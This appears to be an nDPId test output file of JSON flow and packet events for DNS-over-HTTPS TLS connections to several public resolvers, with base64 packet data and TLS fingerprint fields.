01084{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739389936,"flow_last_seen":946739390265,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":845,"midstream":1,"thread_ts_msec":946739390265,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":946739390265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z5AAC8G9+ctTHEfCgAAASD7yzz9Ej0SWq\/nalAQAfnqiwAAu9LAVBlO+s0L+nkwU4YXcw1SOmlRl+XSnXuO6tKFQ694AGFrib2S2f3BX7B1582XtNQQL\/1IwqS9eCXYJzjdfbbKDKnkw+MRH36zeNfFmebdTa26VGWOgnZNECwEpmFBvEXSt2RPI6ofb1vE32eZrFh79Bpuwp1PCG2ngGNn3Z\/o1aRMv577hTiLGHUP3zlCYCAacHiSAEi\/LQgxJOLyR9jugiMcNQxMzI9B1anoxyifvPkh2BJiEbyAypQ1hQGudgFCLTi2Txkt7Eu\/NIUQoPpDLsdh3lHWxNLyLEP9wpzBgp6l3ilL84X1Mk7ZHQuPK\/Oz4yfrJd+G7Oo6i1yrQ\/Adp3qU8KnQ9ptwaIVLOtg8g5ENilAbdYS7Ka3cZHFz4gvVtmLddRHiTcXVf5C1ypTeGluZMusSnmJOjPWY5fp5RP99ayjRwQRdkg+IcNHiO31ps8qxZvYyOJZ7Fb87gLgZwV0IUvyDuDbizEwr2XSGbMEZuVoSHx9QyUP+A3BPmqRGGD9RWvZIaULosdFkVeC1hEiNEcM30Eo27GhCBEkpzGPbQ95LfK337HDa9UlKAktQhKwG8\/hAtMIbbv5Noetnx3T81i7FzhkyHH\/C6g3BkR97pP7xxNGSesRAej+0SV1z2Ux2yezANH89JV1k9OQdFbMalrjLnx8kanK4YG3Zfke83pATlf6RAPV3lPyNNDQQypoZkugKEUxOXS7Rx2XEo0segrTQp7Q+35xLorFirg\/3rbokzMw54\/alVY08gHsLJlNmadq9IZ0Hjxo7ykUIQsSRH59BS476g7Zzq0D6LzWm8dRwgOJiFmUme9r5za2XErhkjyFFtknvfbQcxGFpshYQjf44nBtFebBI6Th81Pz6P4vS1Ab5Ldbe5kqW2W6OFyHBCtpJQLdqxOC1y4j8o1zpDr\/5I6fMit0JvTc1WNaN6qBFlg1P6Gaatd4VK3xOWgpdV7lGy9Cs1aJIggG2JQikJ7xxWvncFI3YNX\/j7e31omXzttI+wKWBnq3libBpSCKXTzvdWZpJ16RDkXLbmBFLlruWHpbIZvg3vh187AjFKcBshFCVg\/9CKx0tdclgUGbHqJ7E6OtJIm4m4kox5tzQjCDUJNS29SjoWoK9anOoaXw7azu80JwAvB5wDC4mKG4pcolzPcWCdGzgc4j\/1wLg0a7\/6J83Mv9Vwe7sgJa0WfVmJh67OWIpAbZv84XgLPcLVo5yXd6\/yWWRMvn+kXy6mm6tMTinzOpwIpfSCVQtp3DNLsEUsIkV1DrWVNbTPvH5GCVkQ8p3Lo5BGZ2lF4qqWWh0bwR33Xc69aAXaHUgKcezVe1FfG3x1Q3qp0cn65Dxae+n\/hfZa1KqbpdsxY\/eLTfFV7m+HIJAbLFSSzH7PU\/MSQj8rvEXnuHMSR3htHNgcZRMLZGZNMcEgX88HYGJMITbgLbQ1nfRTwzL8m8XTnhZtErha6pHrFlPsZ1RNjcoqZKgLKdMg2ezfrI8Jq0lQFzAOf3F4VPbIGq1krTP43rpCLbzYETrqQH8Xz467NmG5PHVJ3Hne12KAqQma4zC6YHwFBTwWUunyHc7Z86uw6NV1GMEfe39uxIB1Th3Q3mEC1zo37vRQUYEr8R3n9WX5ZtJpDmxGTtrG8c0JVrUZpjFnqPj2Uj069ivRfFVD19zTIWIWwVZHNTkf54z1SZJ+bsWwla3CC3KyaPHGsTreYdevDYggE2Ww91a5tn8NCHUwyaWPcCmBikp3+fKDZwg0dx3gKVzU8Hf9Km4EdsDin7gSeY7n3yByLcyqnB3hOSBc1nuPCEOi+hB9GXpEuBRdmMhQLcAelRdGq2lZwOE87jAboVg7rc+WH1wOyzCb4UJFuzyaFs37Li8enr+"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946739390933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739390933,"pkt":"REREREREZmZmZmZmCABFAAFDddBAAH4G12cKAAAB2akUF4T0AbuSPuOKlASrClAYAfavsgAAFgMBARYBAAESAwMYXSzw+8AvMstO05PQ7qPBj27f4mGkG8QM9OU7ZRFcuCDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG5zLmFhLm5ldC51awAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAuLsKlIgLTs2y17K315yEyJxqnsCXfl0yS1kyaNKG0aQ=="}
00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":946739390967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3165,"pkt_l4_len":3131,"thread_ts_msec":946739390967,"pkt":"ZmZmZmZmRERERERECABFAAxPNc5AADgGUl7ZqRQXCgAAAQG7hPSUBKsKkj7kpVAYAfW6vgAAFgMDAHoCAAB2AwNggvgT348vLVfztyje+nh951Uui2O3z\/vCGwcNEmcL7CDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4xMCAAAuACsAAgMEADMAJAAdACCYu4Q1ZjtZfYUrS3fwrroPQafz4tTgHn9jgiQX2w0NexQDAwABARcDAwAgr2vUeHfWinGo7k2fDAirV2y2+2vt58RojQUfF3ywprIXAwMKEF7v66Q95J7Madk2ZEcExfHDptRh16jabZXVGAjSu6ZVpQdW9tsq8WD0VxRfdaushrVbrrTRIk5I0CixRifCcooy6c56kGsUxb8wL+Z+QNmR5uWAeV9nzzlGQpBhNwq90IzHQbBwHdfR22cB\/o+gnP0zKhtFT5pdVatUFFMBXYFPBfgmW+yElY9JLYGDSC\/IIw728fBQlRPlTOPnC6Bd8HZeDEbFd7L\/8oeIRd34AfymHYlFpxJ8CjS4xP7I5o8GpeBcv96KPHtYZV5dsMuE75XBxooOpL9Gr9IWBy6AEdPGcU29oVVhWirzJ93HxYSeGAAYTfsu16+HrpOMUAzFMOyXwLKfIjR9Jx84Zvi3ytxvu8IPsZAmQB9iLco+v\/PYNz44XswLq2rQZtIH4a7\/SiljnI7OvMEtw+9+0ohSjEBjqZNpZ4+Di4Oi4uvLSj90PiJtsiIz50r+luuFIJLrHS\/Bx2ooWNGmf8wIpBNOEoC8uYmbQEc0M0F6MgPM2\/Dc1rxiGmLW966znBcYtqEPAIF5LP4HjDzAMEtUySTvYC8cLBRrZgX4sNAbkCcpNw4QFS6erQa8jKBVOZjyMqQVsAikZDL76qZyWnWAbrLmD+ESPhH+LiOjwj\/BVLLmuPIqP2HgrWrkMLok\/KHXuIbZn7C1n58rcMZq7V+5f3gEi6kXuPOTozMsLixf3wStDsNPpLZW5vF+Opg\/HPuTYMBM+b2VDW0oQ+mGR3v0lSfTyZb2sccxT0\/YFa2\/gZNRs9igar59HBmzwzWtwto1Lj2+tqjOzo9Vxzmqr0QO+5jA9knewsPjci1iEHsBRvkAHDUo8mzkBfWBM8t9UZZElcDeWIg7oO2uY349FEzTQzJrCGLOJ20pc10E+6FXsRSoQcdecc2pqUoNYisiO4BgvfGVRTx3PyLsE2LqpgS5+upDBiBuHq9GTnvPUwfjHUOVZfhEY9kzfkMm52CF0hrFbS1FqZu2k5xWd1RZ+YdcxocleEJLDXEEeCaF2XJug2p3sgxI8AQfg96H0lHo6\/ce7YWyFTSQ5214Zlm5R8arc+k+FFIGpKsd1JRZDuMs6lUG2OcuW4k6GmXOA9lL00+Pu1LlWECRAA38IcMLlvDeoyIVPF5RKHTFbtFfFeynrkfS57BDgpnUQsOLofW+MsR51VSL7z5rFWkT+0yA0OJ4P5J1dZjOVbRrnPj+lP8KBidjvuv\/+vQR9AYL2FUFonbuHYQ6NUOJSyw\/q3koSUCoI9nF1rL5SbnJpgQ9XzQ2ozstAI1DR6AAJPio22EFuEDMEoFVvE\/liE+8UHQnOZNeIN8tMqUAL+WlkvDEcrehWMNUpY287pebSO3eZPDe3egHiaBMZQIlL4jO1lfEjJdr5RXvT9Uv4MVNGGGXCQtr4IWIfMjPSJmmedmBdcxMuZnxTJ7jKLERRom+1LtykcTtbFMZ6nwh7KNIt58CGrTH3Bh+ClGWC6JtjiLbGXtcN8TOs97BoUvfH2xS4muIblEv23sWDZt8uHBdYWb8qBII2zRRCNz4TWmEJd5WuNBsZajJ6+izq\/kuJOWcsJ\/3ClD+JPyh\/faP5RIOC8TtW52DI8iUXjhh0HYoQNP5CK\/yGELUKYphGmQcP1BV0e5C\/xs86j3J4Tqg0y4WesV3d0jU+gkOa\/xZNpDrlV+JnewVAhCkK2UsUk3C84VdKoqUnp9Pil5XcszuqrrK5fn2Ja3xJCvI9oUZYFRkj+cpcHiFBzHL8vrxujIbPqQsQDehofVoxDKQvUog5ZiOw9rqXCH+rf4pa2omETeM1OE52\/bijRwWFKerGk95vgv7mf\/pTz2jvStIe9mIenHJWL7PEZH9sdGDeZQKhralY5AEfcr8PAGFV0XOY4OvHkHHS\/kY45xH7Heg3RGSUSAkY6LhaxYZOH3vCb8pDwz4M8eJ0\/MawhboSpIfQdoDBfBZibpy+ix0cl6f9YHPnTxwCWpi11t8Y\/Ioe5G719Te12HR1+3LJDUG4+t8UMioCT3GNag7c5mMGY+V+40MlPf33OO2SuBDaNUe80cz9ZjBk5x+9\/8yZnlpBgJheqdBeGVTSfNj\/\/ykzVs+ovI3rQWJ7MtuR80iZzcYqQWbI4RBftGKVwyCcJOskMGArD6+UArYfVGIccM6l6ZaD9x6dkigf3LAHA30iuQXdDyjNpxgxl4iSK0oLixFkkGZE94ONcw\/GLLOMYGf3ZsNLQSPf2qyfAF5BKKKg7FAQid7pqgyCZp5F8XKbACdlEb9Lar38xOjvjnewcnGzD4Z6c9THtqSZcDPbz8aL6DmV9lXZmD6\/ccDsDkRU90nhHSMrUF5R8hxDMoP6Be02AohXJwQbll1wPcUEyYk+tfY7XoP1gsqXecmTp+tusAg1\/AwZK8oozX5LgL2HyoOuByw1lgzh0RLilH5JrY3yk0E\/jG5JRoV\/y41cG7xAhvYbSNXDFCXbKeSVI5tgPheZvJ9ZUyIfStt125MRChKnoA2n+mG9KzbpZpyVz66ndTD0j3XU1kDOqjF1\/SbGf1+fhwWGaMMcZUYzUS1y0NN++mGlj87\/Z\/u1peJJRpJLZAkwhE6\/qyvUgAeD6bdzGa3m+9PvZxqRFg4uO5BEHphZPz4E5S9y+qwaFy+ng2E0E\/+Mq99pz8NTeooSlgjy86miBLzf74wOBFSoHbVN0PHL56xSrx12FRC1SCfzqnzT4BREj4eRgr5sVcZJpcqB\/DJ16zqD31Cdz1F6VAt5mHD5hgyW+BhQO6jtpBgHqFisMVPWD18uXILfOEcLKzexTq0enEqkxPPztMgd3lKJoJoLn9D15r82RK7HhKsmZiDKUuCdmH3DjKAbtkj9uSMWDKDEZ7ALu1TTrcVpMz\/u916YJjVrsJ4zke1Y\/PKCwgQji1xX0Q1uKg+Qhmzj0YA6C\/ZB8hBOasuUjTVZER2lXZpSogcQcgdsx7P47du+ZkiOIevUp1ckurR953sVaD3ci+d3blInJn3V2H1nd41bCStQkPyhbrCiGVWDvB4NjqVSIh6ypL1X2Tez7o9uIFek3e\/KdLnjoJYgUoUCdBCeRBScD+0K+sqvZzi8z7OnTzhYK\/aCGv11HpK88nhB\/fu4rCw6Clf8iUvZmwOIdmA\/mXVezV7u9+Y+L4mJOPGGV+Ie7YQjoii0W0J9zldsek4JrCNAfpxxvmfZTghYCrVQJNlGcKyp+LE4s0nXJXsv8iOBmDMV\/qiHS\/RfVp0Al+GVjFpErgTgXH8uFG0eZxhSX5TnPtc5X3FjIRORKWkOyTX+MlnBU+yWrj3iWALBhonn7tNa85eK0vFJHHFGyQm3hMEk7psuYZdoK61bs1KKeUi4RTDX274TTDnDx\/vYrXCGEMbInwJeEUUq10Y0AUNC+ikXVAlZm5\/6b3SLH1mmyzy5AwgfbHNdBdm2h13eHYAHANjDp++p3nOFwMDARmCniHbpabBh0wmz+4GvD7gEaHTo1WwpHFuO0rRndT2cE+rB3NSEIZ\/OfAhdTV9eadRkxEucZ2zRFouLobhVj7VuatuyZROJYubLXxY0L2AD9VfNIXMUeRNHnXvmwyBiqm\/8ZuzuiYxPVzYGJuS41vYyyQm1ND0\/vWricRWNYCIXjgbSqk6PFYh1FVGYRV8SSt7kE3Z3NtrXGW3LuaKD8ymXSg9dYJ9GwRxcPV5is5NEijit\/K0HuZymRnz0biX0ibyZ3bQdAu+3E+KHkL1KMxQnoIP\/X4lavINi95Z\/1+WkK1enaEAwf7tuLJlq5tLt+JOe3OVPJYXu+hVDAzfIFEvugfqxQ4aetpIOYSy0uy\/8Blk6BuP7s0kZRcDAwBF06XPl0W4alPWKLcZUBV1\/sR9gwxnLLJ0WJlMdAUkQ1CCMVwzdsK8lkkZUPttQ7nY8WKaipYb2yNRvSYmxfuU2S\/nIBiL"}
00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739390933,"flow_last_seen":946739390967,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":3394,"flow_avg_l4_payload_len":1697,"midstream":1,"thread_ts_msec":946739390967,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":946739390970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739390970,"pkt":"REREREREZmZmZmZmCABFAAB4ddJAAH4G2DAKAAAB2akUF4T0AbuSPuSllAS3MVAYAfWu5wAAFAMDAAEBFwMDAEWr1XNIOucPlOXvVPAlxCVPjuVei0Kv510pke\/KbmmoYPXHQYgn\/dXPL9SYgvzqDxY7NHWdbkgaLyLveAQw2UhT5DxScM0="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946739400294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739400294,"pkt":"REREREREZmZmZmZmCABFAAFMOfJAAH4GNZwKAAABkv84YqrGAbtdpqacr2JwdlAYAfaNXAAAFgMBAR8BAAEbAwPHJz7Bz9zA6vh2mAtXguxbTFdhb5D1tFb1Dou8iu1ITyDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZG9oLmFwcGxpZWRwcml2YWN5Lm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACADmPqzqEwwIPykBECgQ7iBmKhoGpqhv77PEzGKWzxqPw=="}
00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946739400340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAuAAABAADgGq1qS\/zhiCgAAAQG7qsavYnB2XaanwFAQBBOXkAAAFgMDAHoCAAB2AwMDsBehTQYQ\/iH2Yhpyf+mLl1C35r3Ho6TovknKnjr8riDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZRMCAAAuACsAAgMEADMAJAAdACBo4BH+AA5SyDExxRIaGpKShy1vmsbixTg2m2T2NedPDxQDAwABARcDAwAgvk7ezJo1JZP9LjmZFBvdhSYoK5Td7g7\/A2oIAgI6osUXAwMJ2yS0n6M3Ydri+rIgYVXd+jwuTvP8FF1HMS4hAE9YkVd0802YEbU3pHhUuQANn0vXApBPxbj3FV9uCCuIZCOL4zY7+k\/N9QNOxO6wgqwyjpqF\/MSuGzGbkODdKsjr3MXDrOEDT8UY4Cf7sbDSqOIkajzwlllabjLyw\/JVxOtUepEpKMKQWPduyvGLlnSE+4Pi9X1F5dljLFonfMSt9epl2VwSF1nq8Zl4KKstqyQuG\/zmvd2vjAUtpZ7bRJhqcQEAuZwHSvB\/MtIxXfAzVeG47SjsazBlsuRoBS3fTomilsUH4J13\/0ChaLizKxEdSZ2w2K00iVdJ7hQkti8Yk+XaV61AEfwts012l3Az0Ul6QGn+ovAsikUEMTOdEJmAEExk\/NRuYh4YJeat0fT6qqxPxOtp8iJmxclZOIdEdtKfFRlb\/Q3pIWRMmx+BKdsNQm6TtOsUrqgzJEovgnDvaBUadejY9LBbNHqxMK2V6F7gbnGKVjBjB76l32rCkAGXZjYpu99n3pc8VsX6toeCgNv6uuTb2IhBkEMBsiXbrPavcq8F51o9cjY6ri1T23vFWkuEBAAWOdINJTApJO1joFFgFxyMMNnlCpJoVnqu0i\/rinlDFg7S9CtMSJ0Ubb2fcMiTZVA8sg8c2grczf38tyMaZ9tLwrWkyrDaM66WF+r\/Smzgjb3lUh8vJ3yJCEPyKRtiP8bLVA86MJJR6swDhhbPo5TZc3HPN3paBxU5U9DTyACxQnk6EYqYsA8ZokkmQV3rXvd3nlNnXQvP8iTrcL1LydrbGPEmcxzftt97lwfP6IxI3O3sNlij9LY+i3W9W6NVdJf0gVlPHB34DPsUDzGCBqeTZuUD+fgbA8m0vHZeGLaeh2n\/ATJxgu83kBANWSs0j4JxeZwkxA4LQE6k9KdadeiuFQWUUsCMoytEmeRS+e2CKC26bva8V4F4G5ILpiDrVUa9OPpnIugEC\/pCpbfo45ejO0OYsjmcSB9VHs67ODTG8tfG\/HSnEWghmAKv96DqsZyAaTmkT0JkH5FkXlCzBQ8v8o8b6rSE0lRW\/lesYflMu+sWf50UV63CFJyy6fgpaJPxCw8SCnSJ9Wfe5036kFXS9TxM7sPwyghnAoVeaf7Fck3c5pxthPEaz67tzSOMeekQJOQi7xMcEt3jcaR5XiiPfvpfvbXLOiTYOMcz4nBR25XpUeWEHByMxgi+V+13jYe4gb5oIp\/OYL+ldNmokkEz0NkrXv9PYcDVxLHdE8YvZjA+Y3MOkWFCk9BM\/Rn01CyqbL8CmN\/DvCsMgWqz9BmPnWHQOqMnYSTykXgSFe9FyeKoNSng2DkGXmS4Ish3yys0i\/QIlGlT9piLrC2UOh5tHQYhdkxZTzWOLoSNhJgdpKplLIWgmFyDHNvrhDmwq50tATdlnRMhe0ry66PsM3l0lek7HZ1iPpCZ7a660QlaPE9SZFbRD2hjaqHqZrlPWWwgi6eHfY0gu5vY3pzyuUgNc+IY+oeDLEyaB3ysUDN7Sr1IZYyAtSiOnN0WLtHIeg9uqvR4NEBF0XEfeRxZT0n6RrygJ1nWV+kailDfsz4vklZfPYltDFOyTnwOyyzBO2WpBi+QHoJdR5a+ci207f4TAHC5iWzq9Ov\/CBA21s0iwXcKHtUUuFkXfGsSTcHlMRdWRoqqdrwRmUkHc5FaU6RNse5tyVEdBKfOwfXkDw8I22zIDBmTO4YVBH4Dzw0SEVpSPVqE8m2STbZxIzmRtVGFxbw45tbGu6NUyHfb6XRJMV4vKdl8h+lVfwIggGdSBSYb\/J2WkIjXI5Z1\/s5OXr498b\/Ul1cfjj192V+QV7YEDHDJ0wunGAConliOcHcZIZrOpVaNMM7NeTBxiiUgynpVWjltr\/LQuk0Pld3mEIxmwXht0KmUnXyCvTBJgPYroLRuneYRQPZ1JOgkt\/kdsQBmYrZvkRHKWFwNxkLAhypRqmOoE6eO9TYZgchFtH7ouVK4C6vE0wlk\/wNdktEQVjtjEf81TNo\/lytMdDE\/EAGs9weyRqd\/Hmz5\/6yLIgAilI7sqB7dEuE0iiOXk4T95pQbOjvSnwI7M4B7Q3oDNdWJJRZNp2tZGQNCVfj0OFzEKSZbanefGx8qbWewy7Iup5wriwLbBG\/B7ZFkxdmUnEdpL4pTOBRMxGDxRjV5ioqpujq6Ef07dgH3IGRgJHxsp9J2Qlj8S7lCwwOsTDkI+PhLsXzzIudX\/ZiC+lH4Tm6LciXTHf3hDkr34EJfXHJ2WpSeeCsJZBkZx0OJpBR3y1cyrhzb66IxG0uSRnndSXXBNAmD+Gghsj7Kg4E50GUXibzQRhDNRs87q1TvRNjyYI9h\/opUmKnHAkXz4SItfTxaX2LIVbjHXv1XndcnuHwhJgHhiVGswZvXlXVlX8K4fGgnhgpZ7MSQN2lSYmnj2j7A1n8u\/xbD+JqpDU+SOMNWtYlDQ0M+WzoE91BSSQYj6pIr9DxppqLCgUAfJpZxJ8YTmINwfhMZVMPhUF+vys97o5XgriLF7uzxf2I4907edC79eKV1Vf3Ui9qrIThroIUvlpq69fVaplHqZXdbs+zwj7e2bSPVWUVR0G4cA3aU9fbVCQvpl3a\/SuOWAYL5O1\/gu5GJXDImY\/gEO1xe+OVqS2aF0XojyeNtILIeW1nDYyaMtRMD0J7qIxHbffBANlspXb0qgGJLXRsdV8\/\/lQ9fV9vIoHgsaUsdWxpVNTmqaQBhX+l7X3gEUnrZ2jVkY6Oh5aU+eYdso\/pGSL+gHQ1M1e6uj4SYxfEhZHY1voW\/zrjGcvC2BmpxPhTrZRQE7Z8GgjqyG\/K9Af758C5W6bNB\/xr5yeKDI\/G5cyIFeblO2dJmHUb92Zs9qV6hqZGonI7Nft2QsKRvSQjz6cpX\/ZVUA+5e0AnpZpXEPBjJfZQ24FXs9QBvGk2XnWW8Dboig8I5f6Aa0W91KG5sO3Doyp3jU3SQ\/ah58ZIaBgplOwc2\/XF6kzcQLnHv217TTOCL7ScT90UL1M8uz6xGKTqy83KCKRxOqCSmaU4GimFhTvfwqF7ljKegUp6S9OeYOOt+VYDC0UeVysX6yYVwgIBxXA8D51WCmgGdUznHhIQtp1cWWN2T6pBItiud+sR32LmiE5tMUZYbwm2xu\/Nih47FXpRY2xq\/SEOEBCWv+pct34wnV4RwGw\/IvRU9BDEL1I7Sc1UFJRrazHP37UtPsKE1Z1llTnptgsNBNnDluQKifySFsqvXdr8Wwvn6V56upoM0fLxPG\/\/F6OVsniKNnqDtgpVsVi86SZ5O9M+5OvtEmUD8hQl4gxL2QqLYZIWV6vswIZSATUQuw0pUlpiEaj4PymXC95\/5pMEQnYMyOGFn2xcDAwCAmr0Gh4ZNVa+hT2Dwwrpwf9EMB3SMWmSnSLNfZ1YP9lq\/H3H\/YzkchSbogwVw+NXvSKa3Q5dILWczbhkBruescLznbqY0DC+TTlEnvK+mjob5wwR3lQsp8odDMfmh22P3SAFc1ZvCoRb2GkaVN69lxvgMa3mO7aDcfiHSTbC8C9cXAwMARePoOyVbKZG3xXgBtpg5jANBShpYQchD5Po7jBmjBEffrOCijDBbST3aotIn5HBfw8iB7gJCrbmWU17Z2peLW9KOid+9"}
